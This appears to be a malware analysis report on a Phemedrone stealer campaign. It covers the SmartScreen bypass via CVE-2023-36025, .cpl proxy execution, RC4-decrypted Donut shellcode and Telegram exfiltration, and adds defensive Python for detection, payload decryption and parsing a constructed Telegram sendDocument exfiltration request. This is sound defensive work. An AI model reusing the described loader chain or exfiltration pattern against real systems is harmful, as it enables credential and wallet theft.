Keypoints
- Attackers host malicious Internet Shortcut (.url) files on cloud services (Discord, FileTransfer.io) and use CVE-2023-36025 to bypass Windows Defender SmartScreen prompts.
- The .url file downloads a .cpl (Control Panel DLL) which is executed via control.exe and rundll32.exe to run a first-stage loader that invokes PowerShell.
- The PowerShell second-stage loader (DATA3.txt) is obfuscated and stages an encrypted payload (secure.pdf) that is RC4-decrypted using SystemFunction032 from advapi32.dll.
- The loader uses ActiveDS memory allocation functions and VirtualProtect, then triggers execution of the decrypted shellcode via an API callback (CryptCATCDFOpen) to run the second-stage code in memory.
- Attackers embed Donut shellcode to load and run a .NET assembly in-memory via Unmanaged CLR Hosting, avoiding disk-based artifacts.
- Phemedrone decrypts configuration (RijndaelManaged), enforces a mutex (5dad16bd-6884-4ab8-b182-a504b4c99bcf), collects browser credentials, crypto wallets, app tokens, system info, compresses results, and exfiltrates via Telegram bot API (sendDocument) after validating the token.
MITRE Techniques
- [T1218.002] System Binary Proxy Execution: Control Panel (earlier ATT&CK versions list the parent as Signed Binary Proxy Execution): abuse of the Windows Control Panel binary (control.exe) to execute .cpl files. Source text: "Threat actors leverage MITRE ATT&CK technique T1218.002, which abuses the Windows Control Panel process binary (control.exe) to execute .cpl files."
Indicators of Compromise
- [File names] Stage and payload files β DATA3.txt (obfuscated PowerShell loader), secure.pdf (encrypted second-stage loader).
- [File extensions] Malicious shortcut and payload types β .url (malicious Internet Shortcut used to exploit SmartScreen), .cpl (malicious Control Panel DLL executed via control.exe), and DLLs executed via rundll32.exe.
- [Mutex] Runtime synchronization β mutex value detected: 5dad16bd-6884-4ab8-b182-a504b4c99bcf (used to prevent multiple instances).
- [Hosting/services] Delivery and staging platforms β Discord-hosted links, FileTransfer.io, GitHub (staged payloads), and URL shorteners such as shorturl.at.
- [Exfiltration channel] Telegram bot usage β decrypted Telegram API token and chat ID used to validate via getMe and to send compressed ZIP via the sendDocument API endpoint.
The infection chain begins when a user opens a cloud-hosted .url Internet Shortcut crafted to exploit CVE-2023-36025, which suppresses the Windows Defender SmartScreen warning that would normally precede execution. The shortcut fetches a .cpl file. Because control.exe hands any .cpl it is given to rundll32.exe (Shell32.dll,Control_RunDLL), the malicious Control Panel DLL is loaded and executed by rundll32.exe; that DLL is the first-stage loader, and it launches PowerShell to retrieve an obfuscated second-stage script named DATA3.txt from a remote host (commonly GitHub). DATA3.txt uses string and digit manipulation to hinder static analysis and then stages an encrypted payload saved as secure.pdf, which is not a PDF but an RC4-encrypted blob carrying a decoy extension.
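The process lineage above (control.exe, then rundll32.exe with Shell32.dll,Control_RunDLL and a .cpl, then a PowerShell child) is what an endpoint sensor sees, and it is unusual enough to alert on. The following is an added example, not code from the original report: a small detection over constructed Sysmon-style process-creation records. It flags rundll32 Control_RunDLL launches of a .cpl from a user-writable path and raises severity when that rundll32 process spawns a script host. The sample events, paths and PIDs are invented for the demonstration.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1, reduced to the
# fields the logic needs. Sample data written for this example, not campaign telemetry.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" "C:\Users\u\AppData\Local\Temp\update.cpl"'},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\u\AppData\Local\Temp\update.cpl"'},
    {"pid": 4150, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c (stage-2 download omitted)"},
    # Benign: a user opening the Control Panel. No .cpl argument, no script-host child.
    {"pid": 5000, "ppid": 1200, "image": r"C:\Windows\System32\control.exe",
     "cmdline": "control.exe"},
    # Benign: rundll32 loading a built-in applet from System32.
    {"pid": 5010, "ppid": 5000, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\timedate.cpl"'},
]

CONTROL_RUNDLL = re.compile(r"shell32\.dll,\s*Control_RunDLL", re.IGNORECASE)
CPL_PATH = re.compile(r'([A-Za-z]:\\[^"]*?\.cpl)\b', re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|Windows\\Temp)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_cpl_proxy_chain(events):
    """Return one alert per rundll32 process that runs a .cpl from a user-writable path
    via Control_RunDLL. Severity is 'high' when that process spawns a script host,
    which is the PowerShell stage in this chain, and 'medium' otherwise."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "rundll32.exe" or not CONTROL_RUNDLL.search(e["cmdline"]):
            continue
        m = CPL_PATH.search(e["cmdline"])
        if not m or not USER_WRITABLE.search(m.group(1)):
            continue  # .cpl from a system directory: not the pattern we want
        parent = by_pid.get(e["ppid"])
        children = [c["pid"] for c in events
                    if c["ppid"] == e["pid"] and basename(c["image"]) in SCRIPT_HOSTS]
        alerts.append({
            "technique": "T1218.002",
            "pid": e["pid"],
            "cpl": m.group(1),
            "parent_is_control": parent is not None and basename(parent["image"]) == "control.exe",
            "script_children": children,
            "severity": "high" if children else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_cpl_proxy_chain(SAMPLE_EVENTS):
        print(alert)
```

The user-writable-path filter is what keeps the rule quiet on normal Control Panel use: legitimate applets live under System32, while a dropped .cpl lands in Temp or a profile directory. The parent check is informational rather than required, since a loader can also call rundll32.exe directly.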
secure.pdf is decrypted with SystemFunction032, an undocumented advapi32.dll export that implements RC4 over a data blob and a key blob. The loader then allocates memory with the Activeds.dll exports AllocADsMem/ReallocADsMem, copies the decrypted buffer into it and marks the region executable with VirtualProtect (presumably chosen over the more commonly monitored VirtualAlloc/HeapAlloc). Control is transferred to the second-stage shellcode by handing its address to CryptCATCDFOpen as the PFN_CDF_PARSE_ERROR_CALLBACK parameter, so the Windows API itself calls into the buffer rather than the loader making a direct call. That buffer is Donut-generated shellcode: it decrypts its embedded module with Chaskey, hosts the CLR through the Unmanaged CLR Hosting API, creates an AppDomain and invokes the .NET assembly's entry point, so the main payload is never written to disk.
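When reversing a loader like this one, an analyst usually wants to recover secure.pdf statically rather than run the chain, which means reproducing what SystemFunction032 does: plain RC4, with the key blob driving the key schedule and the data blob XORed with the keystream. The block below is an added example, not code from the report or from the malware; it implements RC4, triages the decrypted buffer, and shows how to test candidate keys pulled from DATA3.txt against a known plaintext prefix. The key and encrypted blob are constructed here for the demonstration and are not values from the campaign.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR, the operation SystemFunction032 applies in place to its data blob.
    Encryption and decryption are the same call."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))                       # key-scheduling algorithm (KSA)
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray(len(data))                 # pseudo-random generation (PRGA) + XOR
    i = j = 0
    for n, b in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = b ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def classify(buf: bytes) -> str:
    """Rough triage of a decrypted buffer. A PE starts with 'MZ'; position-independent
    shellcode such as Donut output has no fixed magic, so it is reported as such."""
    if buf.startswith(b"MZ"):
        return "pe"
    if buf.startswith(b"PK\x03\x04"):
        return "zip"
    return "shellcode-or-unknown"


def recover_key(blob: bytes, candidates, known_prefix: bytes):
    """Try candidate keys (for instance strings recovered from DATA3.txt) against the
    first bytes of the blob; RC4's keystream does not depend on the data, so decrypting
    only len(known_prefix) bytes is enough to test each candidate."""
    for key in candidates:
        if rc4(key, blob[:len(known_prefix)]) == known_prefix:
            return key
    return None


# Constructed stand-in for secure.pdf: a marker encrypted with a constructed key.
DEMO_KEY = b"demo-stage-key"
DEMO_PLAIN = b"MZ" + bytes(range(64))
DEMO_BLOB = rc4(DEMO_KEY, DEMO_PLAIN)

if __name__ == "__main__":
    print("RC4 vector:", rc4(b"Key", b"Plaintext").hex())   # expected bbf316e8d940af0ad3
    print("recovered key:", recover_key(DEMO_BLOB, [b"wrong", DEMO_KEY], b"MZ"))
    print("payload type:", classify(rc4(DEMO_KEY, DEMO_BLOB)))
```

The three standard RC4 test vectors ("Key"/"Plaintext", "Wiki"/"pedia", "Secret"/"Attack at dawn") are the quickest way to confirm the implementation matches what the Windows API produces before trusting it on a real sample. Note that `classify` cannot positively identify Donut shellcode; in this chain the decrypted buffer is expected to fall into the "shellcode-or-unknown" bucket, and the .NET assembly only appears after Donut's own Chaskey decryption.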
The in-memory Phemedrone payload decrypts its configuration (RijndaelManaged), checks the mutex (5dad16bd-…), and spawns service threads discovered via reflection to harvest browser credentials, crypto wallet files, Discord/Telegram artifacts, FileZilla configs, Steam files, system/hardware/geolocation info, and screenshots. Collected data are compressed in memory using MemoryStream and ZipStorage, the Telegram token is validated via getMe, and the ZIP is exfiltrated to the attacker via the Telegram sendDocument API with multipart/form-data POSTs. Persistence mechanisms observed include scheduled tasks to maintain execution.
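For a responder, the most valuable artifacts from this exfiltration step are the bot token and chat ID, because together they identify the operator's Telegram infrastructure and allow the ZIP contents to be reconstructed from a capture. The following is an added example, not code from the report or from Phemedrone: it parses a constructed sendDocument upload of the kind the stealer issues, pulls the token, method, chat_id and attached archive out of the multipart body, and carries the token regex you would use over a memory dump or decrypted config. The request, token, chat ID and archive bytes are invented for the demonstration.

```python
import re

# Bot API paths look like /bot<numeric id>:<35-char secret>/<method>; the same shape is
# what you search for in strings, memory or a decrypted configuration.
TOKEN_RE = re.compile(r"(\d{6,12}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
REQUEST_LINE_RE = re.compile(r"^(?:POST|GET)\s+/bot(\d{6,12}:[A-Za-z0-9_-]{35})/(\w+)")

# Constructed sendDocument upload in the shape of the stealer's multipart POST.
# Token, chat_id and archive bytes are invented for this example; they are not IOCs.
SAMPLE_REQUEST = (
    b"POST /bot123456789:AAExampleTokenForDemoOnly0000000000/sendDocument HTTP/1.1\r\n"
    b"Host: api.telegram.org\r\n"
    b"Content-Type: multipart/form-data; boundary=----demoBoundary\r\n"
    b"\r\n"
    b"------demoBoundary\r\n"
    b'Content-Disposition: form-data; name="chat_id"\r\n'
    b"\r\n"
    b"987654321\r\n"
    b"------demoBoundary\r\n"
    b'Content-Disposition: form-data; name="document"; filename="Output.zip"\r\n'
    b"Content-Type: application/zip\r\n"
    b"\r\n"
    b"PK\x03\x04stub-zip-bytes\r\n"
    b"------demoBoundary--\r\n"
)


def parse_multipart(body: bytes, boundary: bytes):
    """Return {field name: (filename or None, raw content)} for a multipart/form-data body."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disp = re.search(rb'name="([^"]+)"(?:; filename="([^"]*)")?', head)
        if not disp:
            continue
        filename = disp.group(2).decode() if disp.group(2) else None
        fields[disp.group(1).decode()] = (filename, content.removesuffix(b"\r\n"))
    return fields


def parse_telegram_upload(raw: bytes):
    """Extract token, method, chat_id and document metadata from a raw Bot API request.
    Returns None when the request line is not a Bot API call."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    m = REQUEST_LINE_RE.match(request_line.decode(errors="replace"))
    if not m:
        return None
    token, method = m.group(1), m.group(2)
    headers = {}
    for line in header_lines:
        k, _, v = line.decode(errors="replace").partition(":")
        headers[k.strip().lower()] = v.strip()
    bm = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, bm.group(1).encode()) if bm else {}
    doc_name, doc_bytes = fields.get("document", (None, b""))
    chat_id = fields.get("chat_id", (None, b""))[1].decode(errors="replace") or None
    return {
        "bot_id": token.split(":", 1)[0],
        "token": token,
        "method": method,
        "chat_id": chat_id,
        "filename": doc_name,
        "document_size": len(doc_bytes),
        "is_zip": doc_bytes.startswith(b"PK\x03\x04"),
        "validation_url": f"https://api.telegram.org/bot{token}/getMe",
    }


def find_tokens(text: str):
    """Bot tokens found in arbitrary text (strings output, memory dump, decrypted config)."""
    return sorted(set(TOKEN_RE.findall(text)))


if __name__ == "__main__":
    print(parse_telegram_upload(SAMPLE_REQUEST))
```

Two caveats apply in practice. The Bot API is only reachable over HTTPS, so the token and chat ID are visible on the wire only where TLS is inspected; without that, the observable is outbound traffic to api.telegram.org from a process that has no business talking to it. And `getMe` is the validation call the stealer makes before uploading, so a `getMe` request immediately followed by a `sendDocument` from the same host is a tighter signature than either call alone.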